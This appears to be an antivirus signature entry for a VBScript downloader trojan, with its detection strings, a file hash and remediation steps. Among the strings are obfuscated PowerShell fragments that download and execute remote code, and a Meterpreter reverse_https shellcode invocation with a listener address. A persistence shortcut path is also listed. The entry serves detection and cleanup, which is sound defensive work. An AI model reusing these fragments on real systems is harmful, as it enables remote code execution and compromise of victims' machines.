Concrete signature match: Trojan - Appears legitimate but performs malicious actions for VBScript platform, family Valyria
This is a VBScript trojan that acts as a downloader. It uses heavily obfuscated commands to launch PowerShell, which then downloads and executes a second-stage malicious payload from the internet and attempts to create a shortcut (.lnk) file for persistence.
Relevant strings associated with this threat:
- = "powershell.exe . ( ([sTrINg]$VeRBOSePRefeREnCe)[1,3]+'x'-JOIn'') (MACROHSTR_EXT)
- Phtt'+'ps://fi'+'le'+' (MACROHSTR_EXT)
- @box'+'.'+'m (MACROHSTR_EXT)
- @n'+'l.p'+'n'+'g'+' (MACROHSTR_EXT)
- .ReplAc'+'E'+'(([cHa'+'r]55+[cHar'+']'+'83+[c'+'H'+'a'+'r]90),['+'sTR'+'in'+'g][cHar'+']'+'3'+'4'+') (MACROHSTR_EXT)
- P)').REPLaCE(' (MACROHSTR_EXT)
- ',[sTRInG][Char]124).REPLaCE(' (MACROHSTR_EXT)
- ',[sTRInG][Char]36).REPLaCE(([Char]105+[Char]75+[Char]78),[sTRInG][Char]39) ) " (MACROHSTR_EXT)
- Lib "shell32" Alias "ShellExecuteA" (MACROHSTR_EXT)
- transfvw585zbhr.sh/gvw585zbht/spmvw585zbhl6 (MACROHSTR_EXT)
- bfss21appdbfss21atbfss21a\robfss21aming\beros.lnk (MACROHSTR_EXT)
- mnotepad.exe (MACROHSTR_EXT)
- ("setobjshell=wscript.createobject(""wscript.shell"")") (MACROHSTR_EXT)
- ("command=""c:\windows\system32\windowspowershell\v1.0\powershell.exe-windowstylehidden-nop-noexit-ciex((new-objectnet.webclient) (MACROHSTR_EXT)
- downloadstring('https://raw.githubusercontent.com/enigma0x3/generate-macro/master/generate-macro.ps1')) (MACROHSTR_EXT)
- invoke-shellcode-payloadwindows/meterpreter/reverse_https-lhost172.19.240.124-lport1234-force""") (MACROHSTR_EXT)
- writeline("objshell.runcommand,0") (MACROHSTR_EXT)
- wscriptc:\users\public\config.vbs (MACROHSTR_EXT)
- Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True) (MACROHSTR_EXT)
- Set jbxXmlNodeOb = jbxXmlOb.createElement("b64") (MACROHSTR_EXT)
- jbxXmlNodeOb.dataType = "bin.base64" (MACROHSTR_EXT)
- JbxB64Encode = Replace(jbxXmlNodeOb.Text, vbLf, "") (MACROHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)e64a746af330452d57d915d938f3572ee034b29d8058758c8ea7876724cbac6cUse your security software to remove the detected file and run a full system scan. Manually inspect startup locations, including `%APPDATA%\Roaming`, for suspicious shortcut (.lnk) files and remove them. Since this is a downloader, consider isolating the endpoint and investigating for secondary infections.